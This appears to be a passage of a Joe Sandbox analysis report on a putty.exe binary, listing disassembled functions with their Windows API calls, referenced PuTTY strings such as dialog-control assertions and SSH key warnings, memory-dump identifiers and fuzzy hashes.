                            Function 0043DA80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37windowCOMMON
                            Download Yara Rule
                            APIs
                            • MessageBoxA.USER32(00000000,?,00000010), ref: 0043DAB9
                            • PostQuitMessage.USER32(00000001), ref: 0043DADC
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Message$PostQuit
                            • String ID: %.70s Fatal Error
                            • API String ID: 1647143952-1735543297
                            • Opcode ID: d51d0157d1b029ae75f2f36aa7f9422c06822c12592ba0afd521d842187db80e
                            • Instruction ID: 703ac1509dd74b75417c241216f618314377ec3a58b9b4cb029ae826d5fcbeea
                            • Opcode Fuzzy Hash: d51d0157d1b029ae75f2f36aa7f9422c06822c12592ba0afd521d842187db80e
                            • Instruction Fuzzy Hash: 4CF090B1504308BBDB11BB60FD06E9B3AACEF04318F000036FA09A21A2E7B5D954C7DD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043B3BA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendDlgItemMessageA.USER32(?,?,?,?,00000000), ref: 0043B413
                            Strings
                            • c && c->ctrl->generic.type == CTRL_LISTBOX && !c->ctrl->listbox.multisel, xrefs: 0043B3E7
                            • ..\windows\winctrls.c, xrefs: 0043B3E2
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemMessageSend
                            • String ID: ..\windows\winctrls.c$c && c->ctrl->generic.type == CTRL_LISTBOX && !c->ctrl->listbox.multisel
                            • API String ID: 3015471070-81528470
                            • Opcode ID: 5baa8ba02c5f6628edf0e4e542d14aa980aa1ce1cd930435c61ae2643f60b5fb
                            • Instruction ID: 47f775347b7152b60d097843cc850897167a678657cd6e419965c56102af888d
                            • Opcode Fuzzy Hash: 5baa8ba02c5f6628edf0e4e542d14aa980aa1ce1cd930435c61ae2643f60b5fb
                            • Instruction Fuzzy Hash: 1FF0E272280211EFEB118B18EC02F2677A5FF88711F25043AF554D72A1DB78EC60CB9A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043B25E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendDlgItemMessageA.USER32(?,?,?,?,00000000), ref: 0043B2B1
                            Strings
                            • ..\windows\winctrls.c, xrefs: 0043B280
                            • c && c->ctrl->generic.type == CTRL_LISTBOX, xrefs: 0043B285
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemMessageSend
                            • String ID: ..\windows\winctrls.c$c && c->ctrl->generic.type == CTRL_LISTBOX
                            • API String ID: 3015471070-1475260855
                            • Opcode ID: 1a62cffa69266a5dd0b537912fdfb0d52f880682f9f894ad944178eda244f7ca
                            • Instruction ID: 51bb2776d3a5c4395bc65458e30a08a41b9787a0b15e88cf56557293a439253e
                            • Opcode Fuzzy Hash: 1a62cffa69266a5dd0b537912fdfb0d52f880682f9f894ad944178eda244f7ca
                            • Instruction Fuzzy Hash: 8EF02772240601EFDB018B18EC06F1A77A5FF88312F154136F254E72A5CB34EC208B9A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043D37D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33windowCOMMON
                            Download Yara Rule
                            APIs
                            • MessageBoxA.USER32(00000000,00000000,00000000,00000134), ref: 0043D3B2
                            Strings
                            • The first %s supported by the serveris %.64s, which is below the configuredwarning threshold.Do you want to continue with this connection?, xrefs: 0043D388
                            • %s Security Alert, xrefs: 0043D39A
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Message
                            • String ID: %s Security Alert$The first %s supported by the serveris %.64s, which is below the configuredwarning threshold.Do you want to continue with this connection?
                            • API String ID: 2030045667-1902119048
                            • Opcode ID: c2c2e2e8e939cfe637826370b2c0a04a4efcbdd0b1f54b139a8630a522c67022
                            • Instruction ID: e163b29b78944d46dd901cac14e26cca40f44adbb63c17c5ff4aeed59b3e592f
                            • Opcode Fuzzy Hash: c2c2e2e8e939cfe637826370b2c0a04a4efcbdd0b1f54b139a8630a522c67022
                            • Instruction Fuzzy Hash: 75E09B332453107AD7113AB21C47D5F1E98DB85768F10843FF940552E3EB2988D186EE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043B35F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendDlgItemMessageA.USER32(00000000,?,00000187,?,00000000), ref: 0043B3B1
                            Strings
                            • ..\windows\winctrls.c, xrefs: 0043B38D
                            • c && c->ctrl->generic.type == CTRL_LISTBOX && c->ctrl->listbox.multisel && c->ctrl->listbox.height != 0, xrefs: 0043B392
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemMessageSend
                            • String ID: ..\windows\winctrls.c$c && c->ctrl->generic.type == CTRL_LISTBOX && c->ctrl->listbox.multisel && c->ctrl->listbox.height != 0
                            • API String ID: 3015471070-3851265760
                            • Opcode ID: a3ac7fcd7aa229ad4fca1a69d4592cce2edd6043c35b3615ecf6c52ae8ed85c1
                            • Instruction ID: 3d42031dd30cb322284aeb5fd9aa104d9a9cc666bd3d29a6f113e8fd140c7781
                            • Opcode Fuzzy Hash: a3ac7fcd7aa229ad4fca1a69d4592cce2edd6043c35b3615ecf6c52ae8ed85c1
                            • Instruction Fuzzy Hash: 15F0E235240311EFEB104B04EC01F1A37A1EB89322F21012BF684A71A5CB74AC54CB9B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043AEF4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON
                            Download Yara Rule
                            APIs
                            • CheckRadioButton.USER32(?,?,?,?), ref: 0043AF40
                            Strings
                            • ..\windows\winctrls.c, xrefs: 0043AF16
                            • c && c->ctrl->generic.type == CTRL_RADIO, xrefs: 0043AF1B
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ButtonCheckRadio
                            • String ID: ..\windows\winctrls.c$c && c->ctrl->generic.type == CTRL_RADIO
                            • API String ID: 2493629399-812859048
                            • Opcode ID: f2766435d5fc6fe24638f9b0a0145d5c7e7f62c87a872f703af327dab1224d25
                            • Instruction ID: 703d4bc83cac8d99ba9e863ce10e54e4280b1c53cb4251a4721b52140a9040f7
                            • Opcode Fuzzy Hash: f2766435d5fc6fe24638f9b0a0145d5c7e7f62c87a872f703af327dab1224d25
                            • Instruction Fuzzy Hash: 8EF0E275244102EFC7049B04EC01C2677A6EFC8305B24402EF54993291DB30AC21CB9A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044598C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Event
                            • String ID: ..\windows\winhandl.c$h && !h->u.g.moribund
                            • API String ID: 4201588131-1246604691
                            • Opcode ID: f175afbe63e4aa56ccb959c2dbae09f9487a41263a9c2d0c3dafba957fa52a52
                            • Instruction ID: f93ca84c826e04540a16b1b45fffc51779ccf07a8463b935df7041c7bfc36aa7
                            • Opcode Fuzzy Hash: f175afbe63e4aa56ccb959c2dbae09f9487a41263a9c2d0c3dafba957fa52a52
                            • Instruction Fuzzy Hash: B3F0B4B1401B10DFEB715F28A404397B7F0AB04315F050E2FA48281651D3B8A589CBC5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043C30B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                            Download Yara Rule
                            APIs
                            • GetWindowPlacement.USER32(?,?), ref: 0043C332
                            • SetWindowPlacement.USER32(?,0000002C), ref: 0043C34C
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: PlacementWindow
                            • String ID: ,
                            • API String ID: 2154376794-3772416878
                            • Opcode ID: 73749fe9244be7c5c53d54efb0aa2dbffdac15ef74cb42b01e61cd708258dcdc
                            • Instruction ID: ae04609f5e6de7fd6d834b59ae7c1789146d701d0b30ae806a7819a193e8c7f5
                            • Opcode Fuzzy Hash: 73749fe9244be7c5c53d54efb0aa2dbffdac15ef74cb42b01e61cd708258dcdc
                            • Instruction Fuzzy Hash: 0FF0F871805218DBDF109FA4ED487E9BBB8EB48355F108026E811B6150D379D998CFA9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043B4B3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                            Download Yara Rule
                            APIs
                            • SetDlgItemTextA.USER32(?,?,?), ref: 0043B4F4
                            Strings
                            • ..\windows\winctrls.c, xrefs: 0043B4D5
                            • c && c->ctrl->generic.type == CTRL_FILESELECT, xrefs: 0043B4DA
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemText
                            • String ID: ..\windows\winctrls.c$c && c->ctrl->generic.type == CTRL_FILESELECT
                            • API String ID: 3367045223-1785629237
                            • Opcode ID: c2c67c1d29ab704ebc298600bc56134f2465b7254e3b2321edd330d862784b41
                            • Instruction ID: d1be55e4e3112ea8b0bc44eb08893e2830688ec7092fab1a80ba4f43cdcbd61c
                            • Opcode Fuzzy Hash: c2c67c1d29ab704ebc298600bc56134f2465b7254e3b2321edd330d862784b41
                            • Instruction Fuzzy Hash: 4DE09236240602FFDB115B09FD01E2B77A6EFC9711F15443AF284A7265DB35AC20CB9A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043AFC4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                            Download Yara Rule
                            APIs
                            • CheckDlgButton.USER32(?,?,00000000), ref: 0043B007
                            Strings
                            • ..\windows\winctrls.c, xrefs: 0043AFE6
                            • c && c->ctrl->generic.type == CTRL_CHECKBOX, xrefs: 0043AFEB
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ButtonCheck
                            • String ID: ..\windows\winctrls.c$c && c->ctrl->generic.type == CTRL_CHECKBOX
                            • API String ID: 83588225-3937080726
                            • Opcode ID: 11cc214f865bc761df03f06b46b08a1c1400d3e34f281c0f744f233c93f14134
                            • Instruction ID: 0897344bf4113202ed1753a2d3d94a8811d7748486479d6faab9fb0eb67fb1da
                            • Opcode Fuzzy Hash: 11cc214f865bc761df03f06b46b08a1c1400d3e34f281c0f744f233c93f14134
                            • Instruction Fuzzy Hash: 6BE09276285202EFC7016B25BC09C1AB7A5EFC9722B15443AF58492165DB349C70DB97
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043B010 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON
                            Download Yara Rule
                            APIs
                            • IsDlgButtonChecked.USER32(?,?), ref: 0043B049
                            Strings
                            • ..\windows\winctrls.c, xrefs: 0043B032
                            • c && c->ctrl->generic.type == CTRL_CHECKBOX, xrefs: 0043B037
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ButtonChecked
                            • String ID: ..\windows\winctrls.c$c && c->ctrl->generic.type == CTRL_CHECKBOX
                            • API String ID: 1719414920-3937080726
                            • Opcode ID: 1e30b954dbc9717631839a9baa4ffd5c408a7a6938e1b63f404c54dd07bbaa41
                            • Instruction ID: fc1898bb8bef271a677988a39db5a5d7328478a6f6ad76a6740c692739039d1e
                            • Opcode Fuzzy Hash: 1e30b954dbc9717631839a9baa4ffd5c408a7a6938e1b63f404c54dd07bbaa41
                            • Instruction Fuzzy Hash: 3FE0D836284201EFD7015B58FC01D077B61EF89711B254536F25493155DB35DC208B96
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043D442 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26windowCOMMON
                            Download Yara Rule
                            APIs
                            • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0043D471
                            Strings
                            • You are loading an SSH-2 private key which has anold version of the file format. This means your keyfile is not fully tamperproof. Future versions of%s may stop supporting this private key format,so we recommend you convert your key to the newformat.You, xrefs: 0043D44A
                            • %s Key File Warning, xrefs: 0043D45C
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Message
                            • String ID: %s Key File Warning$You are loading an SSH-2 private key which has anold version of the file format. This means your keyfile is not fully tamperproof. Future versions of%s may stop supporting this private key format,so we recommend you convert your key to the newformat.You
                            • API String ID: 2030045667-89788609
                            • Opcode ID: 5be199a4de076817227f26902fad7f8a86018aadc71a32ca8c7e12da5f84c780
                            • Instruction ID: f55e4bba365192e1467e1627dfb3c82729b98ff2e9f457c9b6f48c92826da230
                            • Opcode Fuzzy Hash: 5be199a4de076817227f26902fad7f8a86018aadc71a32ca8c7e12da5f84c780
                            • Instruction Fuzzy Hash: AEE04F3214921075E11137227C07FAA1E58CB82769F14803FF500621E3EF29489181FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044817E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12networkCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: getservbynamehtons
                            • String ID: nA
                            • API String ID: 3889749166-513057715
                            • Opcode ID: c060702ef779c1e65adec5edaff341a09c049367329732cf1a9ba5b5895d9e2f
                            • Instruction ID: 92f7c6b6b2e0e04b4dbdab212dbd5cce27538f931f65795e0f70666a8095565d
                            • Opcode Fuzzy Hash: c060702ef779c1e65adec5edaff341a09c049367329732cf1a9ba5b5895d9e2f
                            • Instruction Fuzzy Hash: 12C08CF0205210AADB000F31CC0CB3B3BE4BB40783F4448A6B688C50B0DF38C890E628
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00451E7D Relevance: 5.1, APIs: 4, Instructions: 57memoryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • HeapReAlloc.KERNEL32(00000000,00000050,75570A60,0045246E,75570A60,00451816,?,000000E0,0044E244,00451816,00451816), ref: 00451EA4
                            • HeapAlloc.KERNEL32(00000008,000041C4,00000000,75570A60,0045246E,75570A60,00451816,?,000000E0,0044E244,00451816,00451816), ref: 00451EDD
                            • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,000000E0,0044E244,00451816,00451816), ref: 00451EFB
                            • HeapFree.KERNEL32(00000000,?,?,000000E0,0044E244,00451816,00451816), ref: 00451F12
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: AllocHeap$FreeVirtual
                            • String ID:
                            • API String ID: 3499195154-0
                            • Opcode ID: bc3824ed58629927f8fe2e60f727e6af6cd10a36af7d4f12a2cc63ef0620167c
                            • Instruction ID: a9cc64317911bd8483c249e87d8fe716d60287f07c5decf3417229a61ef6fbb0
                            • Opcode Fuzzy Hash: bc3824ed58629927f8fe2e60f727e6af6cd10a36af7d4f12a2cc63ef0620167c
                            • Instruction Fuzzy Hash: C91160312087019FD7259F28FC86E167BF9F7853227A0463AF566C22B1C330A885CB48
                            Uniqueness

                            Uniqueness Score: -1.00%